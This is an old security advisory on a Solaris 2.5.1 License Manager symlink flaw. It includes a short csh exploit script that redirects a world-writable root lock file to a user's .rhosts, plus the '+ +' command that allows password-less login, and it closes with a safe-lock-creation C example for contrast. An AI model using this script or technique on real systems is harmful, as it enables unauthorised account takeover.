On Solaris 2.5.1 (and maybe other versions), the License Manager creates lock files that are owned by root and have mode 666 (-rw-rw-rw-, world-writable). This makes it possible for anyone to create these root-owned files anywhere on the system and then modify them.
By replacing a lock file that Solaris's License Manager uses with a symbolic link, a malicious user can replace any file on the system (it seems that it does not overwrite existing files, but rather only creates new ones). The lock file is usually created in a temporary directory (/var/tmp, /tmp, or whatever else the administrator chooses). By simply creating a symbolic link from the lock file (called 'locksuntechd') to some user's '.rhosts' file, a malicious user can remotely log in to that user's account without a password.
The License Manager seems to recreate these files almost instantly after they are removed, making it a "quick" root-owned file creator.
A simple usable script follows:
#!/bin/csh -f
# Change target user name before running
# Iconoclast@thepentagon.com 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
Then you just have to wait a minute and `cat + + >> ~targetuser/.rhosts' to gain access to that user's account.
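For contrast, an added example (not code from the original advisory or from Sun) of how a privileged daemon can create a lock file in a shared temporary directory without the two flaws described above: it refuses to follow a symbolic link and it never leaves the file world-writable. The function name create_lock_safely and the scratch paths are hypothetical, and O_NOFOLLOW is assumed to be available (POSIX.1-2008).

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: returns an open fd on success, -1 on failure. */
int create_lock_safely(const char *path)
{
    struct stat st;
    /* O_EXCL: fail if the name already exists, even as a dangling symlink.
     * O_NOFOLLOW: never traverse a symlink in the final path component. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Verify the opened object: regular file, one link, owned by us. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    /* open()'s mode is filtered by the umask; set it so it is exactly 0600. */
    if (fchmod(fd, 0600) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";   /* constructed scratch directory */
    char lock[64], target[64];
    if (!mkdtemp(dir)) return 1;
    snprintf(lock, sizeof lock, "%s/lockfile", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, lock) != 0) return 1;   /* lock name is a symlink */
    printf("symlink present: %s\n", create_lock_safely(lock) < 0 ? "refused" : "created");
    unlink(lock);
    int fd = create_lock_safely(lock);
    printf("clean path: %s\n", fd >= 0 ? "created, mode 0600" : "failed");
    if (fd >= 0) close(fd);
    unlink(lock);
    rmdir(dir);
    return 0;
}
```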